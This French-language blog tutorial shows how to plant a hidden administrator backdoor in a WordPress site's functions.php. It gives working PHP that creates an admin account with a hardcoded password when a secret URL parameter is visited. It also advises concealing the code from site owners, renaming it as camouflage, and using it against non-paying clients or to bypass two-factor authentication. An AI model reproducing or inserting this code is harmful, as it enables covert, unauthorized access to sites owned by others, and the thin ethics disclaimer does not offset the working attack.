Comment créer un accès administrateur secret par porte dérobée à WordPress

Avez-vous déjà créé un site Web WordPress ou fourni des services à votre client mais n'avez pas été payé ? Si cela vous semble familier, vous avez atterri au bon endroit.

Pour vous protéger de cette situation, vous trouverez peut-être utile de savoir comment créer un accès secret à un site Web par porte dérobée dans WordPress.

De plus, si, pour une raison quelconque, vous ne pouvez pas accéder à votre site Web WordPress, avoir un accès alternatif par porte dérobée pour reprendre le contrôle peut s'avérer très utile !

Dans ce didacticiel, je discuterai de l'accès secret aux sites Web par porte dérobée et des raisons de créer un tel accès pour vous assurer que vous avez toujours accès à vos sites Web.

Enfin, je vous montrerai comment en créer un avec un guide étape par étape suivi d'un conseil éthique.

Qu'est-ce qu'un accès administrateur secret par porte dérobée dans WordPress ?

Comme le terme l'indique, l'accès par porte dérobée est un moyen de retrouver l'accès administrateur à un site Web WordPress si votre connexion habituelle ne fonctionne pas.

Vous vous demandez comment vous pouvez perdre votre compte administrateur ?

Si vous êtes un développeur ou une agence WordPress, vous constaterez peut-être que des clients suppriment votre compte administrateur une fois que vous avez terminé votre travail dans le but de protéger le site Web lorsqu'ils ne paient pas.

Dans le pire des cas, les pirates peuvent obtenir un accès non autorisé à votre site Web et modifier le mot de passe administrateur ou supprimer complètement la connexion.

Si cela se produit, vous avez besoin d'un moyen de retrouver l'accès. C'est là qu'une porte dérobée secrète entre en jeu.

Quelles sont les raisons sous-jacentes pour créer un accès dérobé à un site Web ?

Il existe plusieurs raisons potentielles de créer un accès administrateur secret par porte dérobée à un site Web WordPress :

• Pour retrouver l'accès administrateur en cas de non-paiement par les clients.
• Pour conserver l'accès en cas de piratage du site Web et de modification des détails du compte administrateur.
• Pour permettre un accès facile au panneau d'administration sans se souvenir d'un nom d'utilisateur ou d'un mot de passe.
• Pour contourner les mesures de sécurité qui peuvent être en place, telles que l'authentification à deux facteurs.
• Pour permettre à quelqu'un d'autre d'accéder au site Web sans connaître le mot de passe d'origine que vous utilisez.
• La création d'un accès administrateur secret par porte dérobée peut être utile dans les situations où il est difficile ou peu pratique de se souvenir d' un nom d'utilisateur ou d'un mot de passe.

Cependant, la création d'une porte dérobée peut également constituer un risque pour la sécurité, car elle contourne toutes les mesures de sécurité éventuellement en place.

Par conséquent, je recommande de peser le pour et le contre avant de créer un accès administrateur secret par porte dérobée avant de le faire.

Conseils éthiques sur la création d'un accès dérobé à un site Web

Il y a des implications éthiques dans la création d'un accès secret par porte dérobée au site Web de quelqu'un d'autre. C'est certainement quelque chose à considérer avant d'en créer un.

Quelle que soit la raison valable, vous jouez avec la propriété de quelqu'un d'autre (une fois qu'il l'a payée), alors pensez aux ramifications si vous envisagez d'ajouter une porte dérobée.

Je vous exhorte à ne pas ajouter de portes dérobées aux sites Web à moins qu'il n'y ait pas d'autre choix. Je ne suis pas responsable de telles actions. Je ne le recommande que pour des raisons légitimes ou légales.

Comment fonctionne la porte dérobée de mot de passe WordPress ?

Une porte dérobée WordPress fonctionne en utilisant PHP dans un fichier WordPress principal. Le code que je partagerai dans quelques instants créera un nouveau compte administrateur lorsque vous visiterez une URL spécifique.

Une fois créé, vous pourrez vous connecter à votre site Web et effectuer toutes les tâches dont vous avez besoin.

Lorsque vous enregistrez un extrait de code PHP dans functions.php, vous êtes prêt à le déclencher à l'aide d'une URL avec une requête personnalisée. L'URL inclut le mot-clé que vous insérez lors de la modification du fichier functions.php.

Maintenant, vous vous demandez peut-être si le compte secret existera avant de déclencher la fonction.

La réponse est non". Votre nouveau compte utilisateur ne sera créé qu'une fois que vous aurez déclenché la fonction en utilisant l'URL qui inclut le paramètre spécifique.

Comment créer un accès secret à un site Web de porte dérobée

Le processus suivant consiste à modifier un fichier PHP. C'est parfaitement sûr, mais vous devez vous assurer de bien faire les choses du premier coup.

Suivez ces instructions à la lettre et tout ira bien !

Pour éviter tout problème potentiel, je vous recommande de modifier le fichier functions.php via votre thème enfant. Si vous utilisez le thème Astra, vous pouvez créer un thème enfant en un seul clic.

Étape 1 : Ouvrez le fichier functions.php depuis l'éditeur de fichiers de thème

Nous allons modifier le fichier functions.php, qui est un fichier principal de WordPress.

• Accédez à votre tableau de bord d'administration WordPress.
• Accédez à Apparence > Éditeur de fichier de thème.

• Maintenant, sélectionnez le fichier functions.php dans la barre latérale droite.

Étape 2 : Copiez et collez le code suivant sur le fichier functions.php

Maintenant, tout ce que vous avez à faire est de copier et coller cet extrait de code PHP dans l'éditeur.

 add_action( 'wp_head', 'my_backdoor' ); function my_backdoor() { if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

Vous verrez dans le code qu'il créera un nouvel utilisateur administrateur appelé ' mr_admin ' avec le mot de passe ' pa55w0rd ! '.

Vous pouvez les modifier comme bon vous semble.

• Placez le code n'importe où dans le fichier PHP. Idéalement, entre d'autres fonctions. Vous ne voulez pas que l'administrateur ou les gestionnaires du site sachent que vous injectez ce code, n'est-ce pas ? Donc, je le colle dans la partie centrale inférieure du document.
• Assurez-vous également de coller le code immédiatement au-dessus des marques /** ou immédiatement après les marques */ .

• Appuyez sur le bouton "Mettre à jour le fichier ".

Maintenant, le fichier devrait être mis à jour et votre porte dérobée est en place.

Étape 3 : Créez une URL avec des paramètres personnalisés pour obtenir l'accès administrateur

Désormais, lorsque vous devez déclencher cette fonction ou essayer d'obtenir un accès administrateur, assurez-vous d'ajouter le slug suivant sur le côté droit du domaine :

" /? porte dérobée=aller "

[Ici, backdoor est le paramètre de requête après le mot-clé GET ]. Pour être plus précis, regardez la capture d'écran suivante :

Ainsi, si votre site Web est www.xyz.com , l'URL d'accès de la porte dérobée sera « www.xyz.com/?backdoor=go ».

Après avoir ajouté le slug à côté du nom de domaine, appuyez sur Entrée.

Bam ! C'est aussi simple que ça!

Maintenant, vérifiez votre nouveau compte d'utilisateur administrateur depuis Users > All Users .

Conseil de pro : Soyez plus sournois et camouflez la porte dérobée

Astuce 1 : Modifier les paramètres et le nom de la fonction

Vous pouvez modifier le nom de la fonction, les paramètres de l'extrait de code selon vos besoins.

De cette façon, vous pouvez vous déguiser avec un camouflage. Voici l'extrait de code de camouflage où j'ai changé le mot-clé, " porte dérobée " en " voie " :

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

Cela signifierait que votre URL de www.xyz.com deviendrait " www.xyz.com/?pathway=go ".

Astuce 2 : Changer le nom d'utilisateur

Pour changer le nom d'utilisateur, remplacez la chaîne « mr_admin » par « hellboy »

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

Astuce 3 : Changer le mot de passe

Pour changer le mot de passe, remplacez le mot-clé « pa55w0rd! ” avec “ hell_pass! ”.

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'hell_pass!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

Astuce 4 : Construire la nouvelle URL et le nouveau slug

Ainsi, pour déclencher la fonction, vous devez utiliser l'URL suivante avec le mot-clé « path » :

www.xyz.com/?pathway=aller

Et c'est tout. Vous avez maintenant créé une porte dérobée et pratiqué la personnalisation des paramètres pour les rendre uniques. !

Maintenant c'est ton tour!

N'oubliez pas que l'ajout d'un accès secret à un site Web par porte dérobée ne doit pas être fait à la légère. Mais, si vous avez besoin de le faire, vous savez maintenant comment.

Quelle que soit la raison pour laquelle vous pourriez avoir besoin de retrouver l'accès à un site Web, c'est l'un des moyens les plus simples de le faire.

Si vous êtes bloqué avec l'une de ces étapes, n'hésitez pas à m'écrire dans la section des commentaires ci-dessous.

Vous pouvez également rejoindre ma communauté Facebook pour vous tenir au courant de mes dernières actualités !